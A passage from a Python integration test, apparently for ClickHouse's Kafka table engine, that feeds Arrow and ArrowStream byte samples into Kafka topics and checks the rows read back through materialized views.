\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00\x0a\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00\x18\x00\x00\x00\x1a\x00\x00\x00\x1c\x00\x00\x00\x1e\x00\x00\x00\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
b'\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
],
},
'ArrowStream' : {
'data_sample' : [
b'\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00',
b'\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00\x0a\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00\x18\x00\x00\x00\x1a\x00\x00\x00\x1c\x00\x00\x00\x1e\x00\x00\x00\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\xff\xff\xff\xff\x00\x00\x00\x00',
b'\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00',
],
},
}
for format_name, format_opts in list(all_formats.items()):
logging.debug(('Set up {}'.format(format_name)))
topic_name = 'format_tests_{}'.format(format_name)
data_sample = format_opts['data_sample']
data_prefix = []
# prepend empty value when supported
if format_opts.get('supports_empty_value', False):
data_prefix = data_prefix + ['']
kafka_produce(kafka_cluster, topic_name, data_prefix + data_sample)
instance.query('''
DROP TABLE IF EXISTS test.kafka_{format_name};
CREATE TABLE test.kafka_{format_name} (
id Int64,
blockNo UInt16,
val1 String,
val2 Float32,
val3 UInt8
) ENGINE = Kafka()
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}_group',
kafka_format = '{format_name}',
kafka_flush_interval_ms = 1000 {extra_settings};
DROP TABLE IF EXISTS test.kafka_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_{format_name}_mv Engine=Log AS
SELECT *, _topic, _partition, _offset FROM test.kafka_{format_name};
'''.format(topic_name=topic_name, format_name=format_name,
extra_settings=format_opts.get('extra_settings') or ''))
instance.wait_for_log_line('kafka.*Committed offset [0-9]+.*format_tests_', repetitions=len(all_formats.keys()), look_behind_lines=12000)
for format_name, format_opts in list(all_formats.items()):
logging.debug(('Checking {}'.format(format_name)))
topic_name = f'format_tests_{format_name}'
# shift offsets by 1 if format supports empty value
offsets = [1, 2, 3] if format_opts.get('supports_empty_value', False) else [0, 1, 2]
result = instance.query('SELECT * FROM test.kafka_{format_name}_mv;'.format(format_name=format_name))
expected = '''\
0 0 AM 0.5 1 {topic_name} 0 {offset_0}
1 0 AM 0.5 1 {topic_name} 0 {offset_1}
2 0 AM 0.5 1 {topic_name} 0 {offset_1}
3 0 AM 0.5 1 {topic_name} 0 {offset_1}
4 0 AM 0.5 1 {topic_name} 0 {offset_1}
5 0 AM 0.5 1 {topic_name} 0 {offset_1}
6 0 AM 0.5 1 {topic_name} 0 {offset_1}
7 0 AM 0.5 1 {topic_name} 0 {offset_1}
8 0 AM 0.5 1 {topic_name} 0 {offset_1}
9 0 AM 0.5 1 {topic_name} 0 {offset_1}
10 0 AM 0.5 1 {topic_name} 0 {offset_1}
11 0 AM 0.5 1 {topic_name} 0 {offset_1}
12 0 AM 0.5 1 {topic_name} 0 {offset_1}
13 0 AM 0.5 1 {topic_name} 0 {offset_1}
14 0 AM 0.5 1 {topic_name} 0 {offset_1}
15 0 AM 0.5 1 {topic_name} 0 {offset_1}
0 0 AM 0.5 1 {topic_name} 0 {offset_2}
'''.format(topic_name=topic_name, offset_0=offsets[0], offset_1=offsets[1], offset_2=offsets[2])
assert TSV(result) == TSV(expected), 'Proper result for format: {}'.format(format_name)
kafka_delete_topic(admin_client, topic_name)
